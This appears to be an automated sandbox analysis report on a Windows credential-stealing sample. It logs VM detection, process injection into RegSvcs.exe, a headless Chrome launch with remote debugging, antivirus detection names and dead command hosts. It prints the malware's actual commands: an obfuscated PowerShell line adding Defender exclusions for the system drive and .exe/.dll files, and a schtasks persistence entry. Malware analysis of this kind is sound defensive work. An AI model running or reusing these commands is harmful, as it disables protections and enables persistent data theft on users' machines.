
Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ April 24, 2023, 8:52 a.m.	stacktrace: exception.instruction_r: ed e9 85 cc 00 00 f0 14 0f 86 3d d0 8c c2 2e 00 exception.symbol: 11+0x938c31 exception.instruction: in eax, dx exception.module: 11.exe exception.exception_code: 0xc0000096 exception.offset: 9669681 exception.address: 0x12f8c31 registers.esp: 1833752 registers.edi: 17120201 registers.eax: 1447909480 registers.ebp: 15515648 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 3588360 registers.ecx: 10	1	0	0

Executed a process and injected code into it, probably while unpacking (50 out of 120 events)

Time & API	Arguments	Status	Return
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x0000017c suspend_count: 1 process_identifier: 2536	1	0
CreateProcessInternalW April 24, 2023, 8:52 a.m.	thread_identifier: 2748 thread_handle: 0x0000027c process_identifier: 2744 current_directory: C:\Windows\Temp filepath: C:\Windows\Temp\11.exe track: 1 command_line: "C:\Windows\Temp\11.exe" filepath_r: C:\Windows\Temp\11.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000280	1	1
CreateProcessInternalW April 24, 2023, 8:52 a.m.	thread_identifier: 2788 thread_handle: 0x000001d4 process_identifier: 2784 current_directory: C:\Windows\Temp filepath: C:\Windows\Temp\123.exe track: 1 command_line: "C:\Windows\Temp\123.exe" filepath_r: C:\Windows\Temp\123.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
CreateProcessInternalW April 24, 2023, 8:52 a.m.	thread_identifier: 2828 thread_handle: 0x000001cc process_identifier: 2824 current_directory: C:\Windows\Temp filepath: C:\Windows\Temp\321.exe track: 1 command_line: "C:\Windows\Temp\321.exe" filepath_r: C:\Windows\Temp\321.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002a8	1	1
NtGetContextThread April 24, 2023, 8:52 a.m.	thread_handle: 0xfffffffe	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000100 suspend_count: 1 process_identifier: 2744	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000170 suspend_count: 1 process_identifier: 2744	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x000001b0 suspend_count: 1 process_identifier: 2744	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000214 suspend_count: 1 process_identifier: 2744	1	0
NtGetContextThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000104	1	0
NtGetContextThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000104	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000104 suspend_count: 1 process_identifier: 2744	1	0
NtGetContextThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000104	1	0
NtGetContextThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000104	1	0
NtGetContextThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000104	1	0
NtSetContextThread April 24, 2023, 8:52 a.m.	registers.eip: 1916218244 registers.esp: 1829124 registers.edi: 78360895 registers.eax: 91947520 registers.ebp: 1829164 registers.edx: 91 registers.ebx: 0 registers.esi: 91 registers.ecx: 54381352 thread_handle: 0x00000104 process_identifier: 2744	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000104 suspend_count: 1 process_identifier: 2744	1	0
CreateProcessInternalW April 24, 2023, 8:52 a.m.	thread_identifier: 2916 thread_handle: 0x00000020 process_identifier: 2912 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000002c	1	1
NtGetContextThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000020	1	0
NtAllocateVirtualMemory April 24, 2023, 8:52 a.m.	process_identifier: 2912 region_size: 1077248 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0
WriteProcessMemory April 24, 2023, 8:52 a.m.	buffer: base_address: 0x00400000 process_identifier: 2912 process_handle: 0x0000002c	1	1
WriteProcessMemory April 24, 2023, 8:52 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2912 process_handle: 0x0000002c	1	1
NtSetContextThread April 24, 2023, 8:52 a.m.	registers.eip: 1995571652 registers.esp: 4062828 registers.edi: 0 registers.eax: 4770222 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000020 process_identifier: 2912	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000020 suspend_count: 1 process_identifier: 2912	1	0
NtGetContextThread April 24, 2023, 8:52 a.m.	thread_handle: 0xfffffffe	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000128 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x000001d8 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 2824	1	0
CreateProcessInternalW April 24, 2023, 8:52 a.m.	thread_identifier: 812 thread_handle: 0x00000350 process_identifier: 604 current_directory: C:\Windows\Temp filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --remote-debugging-port=34041 --headless --user-data-dir="C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" --profile-directory="Default" filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000034c	1	1
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x000004a4 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000408 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x000004c4 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000504 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000518 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000134 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x000003c0 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x00000308 suspend_count: 1 process_identifier: 2824	1	0
NtResumeThread April 24, 2023, 8:52 a.m.	thread_handle: 0x0000056c suspend_count: 1 process_identifier: 2824	1	0
CreateProcessInternalW April 24, 2023, 8:52 a.m.	thread_identifier: 2208 thread_handle: 0x000004c4 process_identifier: 2236 current_directory: filepath: track: 1 command_line: powershell "Start-Process <#xkagfzgnanuo#> powershell <#xkagfzgnanuo#> -Verb <#xkagfzgnanuo#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force' filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000004c8	1	1
CreateProcessInternalW April 24, 2023, 8:52 a.m.	thread_identifier: 2940 thread_handle: 0x000004c4 process_identifier: 3012 current_directory: filepath: track: 1 command_line: schtasks /create /sc daily /st 12:00 /f /tn "RegSvcs" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000004c8	1	1
CreateProcessInternalW April 24, 2023, 8:45 a.m.	thread_identifier: 800 thread_handle: 0x00000000000000a0 process_identifier: 1404 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User DataUYQOJ" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x90,0x94,0x98,0x8c,0x9c,0x7fef42df1e8,0x7fef42df1f8,0x7fef42df208 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000000000000a4	1	1
CreateProcessInternalW April 24, 2023, 8:45 a.m.	thread_identifier: 196 thread_handle: 0x0000000000000140 process_identifier: 152 current_directory: filepath: track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=812 --on-initialized-event-handle=312 --parent-handle=316 /prefetch:6 filepath_r: stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000144	1	1
CreateProcessInternalW April 24, 2023, 8:45 a.m.	thread_identifier: 2216 thread_handle: 0x0000000000000164 process_identifier: 2212 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\test22\AppData\Local\Temp --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod= --annotation=ver= --initial-client-data=0x154,0x158,0x15c,0x150,0x160,0x7fef3fc7218,0x7fef3fc7228,0x7fef3fc7238 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000168	1	1
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x00000000000001e8 suspend_count: 1 process_identifier: 604	1	0
CreateProcessInternalW April 24, 2023, 8:45 a.m.	thread_identifier: 2956 thread_handle: 0x000000000000058c process_identifier: 2952 current_directory: filepath: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe track: 1 command_line: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --use-gl=osmesa --disable-gpu-compositing --service-pipe-token=B1AB0C9BC1D259F23D5C4A2C2FB7C4DF --lang=en-US --headless --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=B1AB0C9BC1D259F23D5C4A2C2FB7C4DF --renderer-client-id=2 --mojo-platform-channel-handle=1168 /prefetch:1 filepath_r: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe stack_pivoted: 0 creation_flags: 17302540 (CREATE_BREAKAWAY_FROM_JOB\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|DETACHED_PROCESS\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000588	1	1
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x00000000000000e4 suspend_count: 1 process_identifier: 1404	1	0
NtResumeThread April 24, 2023, 8:45 a.m.	thread_handle: 0x00000000000000cc suspend_count: 1 process_identifier: 2212	1	0
NtGetContextThread April 24, 2023, 8:45 a.m.	thread_handle: 0x000000000000012c	1	0

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Bkav	W32.AIDetect.malware2
Lionic	Trojan.Win32.Stealer.12!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.66592598
FireEye	Generic.mg.75e3b5b17db31f0f
CAT-QuickHeal	Trojan.Miner.KG5
ALYac	Gen:Variant.Babar.98965
Cylance	unsafe
Sangfor	Spyware.Win32.Agent.Vn74
Alibaba	TrojanSpy:Win32/Stealer.88b8f794
K7GW	Trojan ( 0059b42a1 )
CrowdStrike	win/malicious_confidence_100% (W)
Arcabit	Trojan.Lazy.D517C8 [many]
Cyren	W32/Agent.CGU.gen!Eldorado
Symantec	Trojan Horse
ESET-NOD32	multiple detections
Cynet	Malicious (score: 100)
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan-Spy.Win32.Stealer.dvbs
BitDefender	Trojan.GenericKD.66594293
NANO-Antivirus	Virus.Win32.Gen-Crypt.ccnc
Avast	Win32:Evo-gen [Trj]
Tencent	Win32.Trojan-Spy.Stealer.Ojgl
Emsisoft	Trojan.GenericKD.66592598 (B)
F-Secure	Trojan.TR/AD.RedLineSteal.pmmvv
VIPRE	Gen:Variant.Lazy.333768
TrendMicro	TrojanSpy.Win32.REDLINE.YXDDWZ
McAfee-GW-Edition	BehavesLike.Win32.Generic.vc
Sophos	Mal/Generic-S
Ikarus	Trojan.Win32.Crypt
Webroot	W32.Malware.Gen
Avira	TR/AD.Nekark.nlpzl
Gridinsoft	Malware.Win32.RedLine.bot
Microsoft	Trojan:Win32/Woreflint.A!cl
ZoneAlarm	Trojan-Spy.Win32.Stealer.dvbs
GData	Win32.Trojan-Stealer.Cordimik.F7J1J6
Google	Detected
McAfee	Artemis!75E3B5B17DB3
MAX	malware (ai score=82)
Malwarebytes	Trojan.MalPack
Zoner	Probably Heur.ExeHeaderL
TrendMicro-HouseCall	TROJ_GEN.R002H0CDN23
Rising	Trojan.Generic@AI.99 (RDML:2PTmEiatq7nWEKS+YKM3Wg)
Yandex	Trojan.Agent!Fw87TM+XcPM
SentinelOne	Static AI - Malicious SFX
Fortinet	W32/PossibleThreat
BitDefenderTheta	Gen:NN.ZexaF.36164.RF0@ayyxcfbO
AVG	Win32:Evo-gen [Trj]
DeepInstinct	MALICIOUS

The process powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	46.173.218.172:80
dead_host	84.252.73.140:80

127.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All